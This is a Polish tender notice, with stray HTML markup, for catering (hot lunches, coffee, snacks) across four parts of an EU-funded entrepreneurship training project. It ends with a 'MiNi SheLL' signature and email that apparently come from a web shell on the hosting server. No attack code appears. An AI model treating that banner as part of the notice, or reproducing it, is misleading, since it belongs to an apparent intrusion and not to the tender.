                            Przedmiotem zamówienia jest świadczenie usług cateringowych (obiad i serwis kawowy) dla uczestników projektu podczas szkoleń organizowanych przez Zamawiającego w ramach projektu pn. Nie trać czasu-załóż własną firmę spełniaj się zawodowo  III!  w ramach Europejskiego Funduszu Społecznego Działanie 6.2 PO KL.
Zakres zamówienia dla części 1 obejmuje:
1.	Codzienne przygotowanie i dostarczanie posiłków w trakcie zajęć  dla uczestników projektu w ilości 11 spotkań dla 6 grup liczących  max po 10 osób w godzinach podanych przez Zamawiającego.
2.	Przedmiotem zamówienia jest 1 posiłek dziennie dla każdego uczestnika. Zajęcia prowadzone są 2 x w tygodniu dla każdej grupy.
3.	Posiłek powinien składać się z dania głównego (drugie danie). Danie główne powinno składać się z porcji mięsa (120 -150 g), ziemniaków (250 g), zestaw dwóch surówek (200 g).  Zamawiający dopuszcza zestaw obiadowy wg jadłospisu obowiązującego u Wykonawcy.
4.	Posiłki powinny być urozmaicone i nie powinny powtarzać się w przeciągu jednego tygodnia.
5.	Posiłek powinien być dostarczony do miejsca podanego przez Zamawiającego w porcjach dla jednej osoby, podawany na ciepło, w jednorazowych pojemnikach z kompletem sztućców jednorazowych. 
6.	Posiłki powinny być przygotowane zgodnie z polskimi normami żywieniowymi, z produktów o wysokim standardzie.
7.	Zamawiający ma prawo na bieżąco kontrolować realizację zamówienia.
8.	Wykonawca będzie realizował zamówienie w danym dniu na telefoniczne zamówienie zamawiającego na 3 godziny przed dostarczeniem posiłku. Informacja telefoniczna zawierać będzie informację o miejscu dostarczenia posiłku i liczbie posiłków.
9.	Serwis kawowy (na każdy dzień szkolenia w godzinach szkolenia podanych przez zamawiającego) : 
-gorąca kawa rozpuszczalna i herbata, podane w termosach  na 11 spotkań dla 6 grup liczących  max po 10 osób;
-dodatki: cukier, cytryna, mleko;
-mieszanka kruchych ciasteczek (co najmniej 3 rodzaje);
-woda mineralna gazowana, niegazowana, podana w butelkach plastikowych o pojemności 500 ml, po 1 szt. na osobę z każdego rodzaju;
- filiżanki jednorazowe (min.200 ml), łyżeczki, serwetki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3, 55.52.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usługi cateringowej dla  członków Komisji Oceny Wniosków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  Nr 2  Świadczenie usługi cateringowej dla  członków Komisji Oceny Wniosków
                            Przedmiotem zamówienia jest świadczenie usług cateringowych (obiad i serwis kawowy) na posiedzenia Komisji Oceny Wniosków  oceniającej wnioski w ramach projektu pn. Nie trać czasu-załóż własną firmę spełniaj się zawodowo ! III  w ramach Europejskiego Funduszu Społecznego Działanie 6.2 PO KL.
Zakres zamówienia dla części 2 obejmuje: 
1.Serwis kawowy (na dzień posiedzenia w godzinach podanych przez zamawiającego): 
-gorąca kawa rozpuszczalna i herbata, podane w termosach dla nie więcej niż 10 osób przez  8 dni;
-dodatki: cukier, cytryna, mleko;
-wyroby piekarnicze -min. po 200 g -osobę;
-woda mineralna gazowana, niegazowana, podana w butelkach plastikowych o pojemności 500 ml, po 1 szt. na osobę z każdego rodzaju;
-tartinki (kanapeczki ozdobne, koktajlowe)
- filiżanki jednorazowe (min.200 ml), łyżeczki, serwetki.
2.liczba dni świadczenia usługi: 8 dni dla nie więcej niż 10 osób  posiłek dziennie dla każdego
uczestnika Komisji Oceny Wniosków.
3.  Posiłek powinien składać się z dania głównego (drugie danie). Danie główne powinno   składać się z porcji mięsa (120 - 150 g), ziemniaków  (250 g), sałatka warzywna -200 g-( z grillowanym kurczakiem lub serem feta).  Zamawiający dopuszcza zestaw obiadowy wg jadłospisu obowiązującego u Wykonawcy.
4. Posiłek powinien być dostarczony do miejsca podanego przez Zamawiającego w porcjach dla jednej osoby, podawany na ciepło, w jednorazowych pojemnikach z kompletem sztućców jednorazowych. 
5.Wykonawca będzie realizował zamówienie w danym dniu na telefoniczne zamówienie zamawiającego na 3 godziny przed dostarczeniem posiłku. Informacja telefoniczna zawierać będzie informację o  liczbie posiłków.
6. Liczba dni świadczenia usługi: 8 dni dla nie więcej niż 10 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3, 55.52.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usługi cateringowej dla uczestników  konferencji i spotkań promujących projekt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część Nr 3  Świadczenie usługi cateringowej dla uczestników  konferencji i spotkań 
promujących projekt
Przedmiotem zamówienia jest świadczenie usług cateringowych ( serwis kawowy) dla uczestników konferencji i spotkań promujących projekt u pn. Nie trać czasu-załóż własną firmę spełniaj się zawodowo ! III  w ramach Europejskiego Funduszu Społecznego Działanie 6.2 PO KL
Zakres zamówienia dla części 3 obejmuje: 
1.Serwis kawowy (na dzień konferencji w godzinach podanych przez zamawiającego) :
-gorąca kawa rozpuszczalna i herbata, podane w termosach dla 30 osób.
-dodatki: cukier, cytryna, mleko;
- wyroby piekarnicze -min. po 200 g -osobę;
-woda mineralna gazowana, niegazowana, podana w butelkach plastikowych o pojemności 500 ml, po 1 szt. na osobę z każdego rodzaju;
- tartinki (kanapeczki ozdobne, koktajlowe);
- filiżanki jednorazowe (min.200 ml), łyżeczki, serwetki.
2.Planowana liczba uczestników 1 konferencji-  30osób. Zaplanowano 4 konferencje w okresie od dnia podpisania umowy do dnia 31.03.2015, średnio 1 x w roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3, 55.52.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usługi cateringowej dla  członków Komisji Rekrutacyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część Nr 4  Świadczenie usługi cateringowej dla  członków Komisji Rekrutacyjnej 
                           Przedmiotem zamówienia jest świadczenie usług cateringowych (obiad i serwis kawowy) na posiedzenia Komisji Rekrutacyjnej  oceniającej wnioski w ramach projektu pn. Nie trać czasu-załóż własną firmę spełniaj się zawodowo ! III  w ramach Europejskiego Funduszu Społecznego Działanie 6.2 PO KL
Zakres zamówienia dla części 4 obejmuje: 
1.Serwis kawowy (na dzień posiedzenia w godzinach podanych przez zamawiającego): 
-gorąca kawa rozpuszczalna i herbata, podane w termosach dla nie więcej niż 5 osób przez 6 dni ;
  -dodatki: cukier, cytryna, mleko;
  -wyroby piekarnicze po 200g -osobę;
  -woda mineralna gazowana, niegazowana, podana w butelkach plastikowych o pojemności 500 ml,   po 1 szt. na osobę z każdego rodzaju;
-  tartinki (kanapeczki ozdobne, koktajlowe);
- filiżanki jednorazowe (200 ml), łyżeczki, serwetki.
2. Posiłek dziennie dla każdego  członka Komisji Oceny Wniosków.
 - posiłek powinien składać się z dania głównego (drugie danie). Danie główne   powinno składać   się z porcji mięsa (120 - 150 g), ziemniaków (250 g),  sałatka warzywna- 200g 9z grillowanym kurczakiem lub serem feta). Zamawiający  dopuszcza zestaw obiadowy wg jadłospisu obowiązującego u Wykonawcy.
  - posiłek powinien być dostarczony do miejsca podanego przez Zamawiającego w porcjach dla    
    jednej  osoby, podawany na ciepło, w jednorazowych pojemnikach z  kompletem sztućców   
    jednorazowych. 
 -  wykonawca będzie realizował zamówienie w danym dniu na telefoniczne zamówienie   
   zamawiającego na 3 godziny przed dostarczeniem posiłku. Informacja telefoniczna zawierać będzie    
   informację o  liczbie posiłków.
 3.Liczba dni świadczenia usługi: 6 dni dla nie więcej niż 5 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3, 55.52.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com